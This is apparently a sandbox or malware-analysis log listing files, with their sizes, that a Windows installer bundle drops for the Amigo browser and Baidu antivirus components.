%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\wow_helper.exe (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bg.pak (1668 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ÞôýþúûðÑÂÂÑÂÂýøúø.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\el.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lt.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fil.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sv.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\chrome.7z (1341364 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ca.pak (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\gcswf32.dll (108196 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\tr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\d3dcompiler_46.dll (22433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\cs.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\master_preferences (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bn.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\d3dcompiler_43.dll (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es-419.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-TW.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-GB.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\uk.pak (1648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\VisualElements\splash-620x300.png (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ms.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\master_preferences (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fr.pak (251 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-TW.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\el.pak (1699 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sr.pak (1636 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\gu.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\amigo.exe (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sw.pak (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\VisualElementsManifest.xml (391 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ro.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fi.pak (220 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\secondarytile.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\nacl64.exe (12289 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\extensions\kgkggmpkealihpbjpdmcblcplljamohl.json (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\et.pak (207 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\da.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\uk.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lv.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lt.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-GB.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nb.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\de.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sk.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hu.dll (8 bytes)
%Documents and Settings%\%current user%\Desktop\ÞôýþúûðÑÂÂÑÂÂýøúø.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_frame_helper.exe (82 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\libegl.dll (107 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-US.pak (195 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\de.pak (234 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\cs.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sl.pak (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\tr.pak (231 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_touch_100_percent.pak (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\nacl_irt_x86_32.nexe (42362 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sv.pak (214 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\id.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\nacl_irt_x86_64.nexe (28502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\th.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\vi.pak (263 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-CN.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\metro_driver.dll (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\mr.pak (1748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-PKUDN.tmp\setup.tmp (3781 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDUDiskGuard.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\SysFixerConfig.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMDownload.dll (15336 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0002.sys (13168 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebSafePlugin.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\white_list.dat (12088 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCCallbackBind.dll (1552 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKitUtils.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCScriptBind.dll (32128 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMFrameWork.dll (21480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMSDWrench.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanS.dll (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\vatl.msi (6584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\directui license.txt (593 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMUpdate.dll (12104 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\百度æÂ€毒\百度æÂ€毒.lnk (907 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\804.dat (3 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bduf.dll (13584 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0002.dll (16424 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\PrivacyProtect.dll (6360 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\bd0001.sys (8752 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\RtpContainerConfig.xml (818 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMAVE.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavEngine.dll (3312 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
%System%\config\system (1178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDShellExt64.dll (15168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMLog.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDLogicUtils.dll (16864 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\InstallCfg.xml (177 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\putips_wording.dat (580 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\hipsClient.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanH.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDKVRecomm.dll (58402 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanM.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
%Documents and Settings%\All Users\Desktop\百度æÂ€毒.lnk (895 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\baidusdRepair.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\res\InstallWnd.zip (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDArKit.sys (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\app.ico (12024 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\DesktopToast.exe (3616 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVRecomm.dll (13122 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\dl.dll (65930 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\uninst.exe (29256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\tips.xml (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BDMPerfMon.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\GCCommunicate.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\Cooly_PluginConfig.xml (726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\file\BavScanV.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%System%\drivers\bd0003.sys (55 bytes)
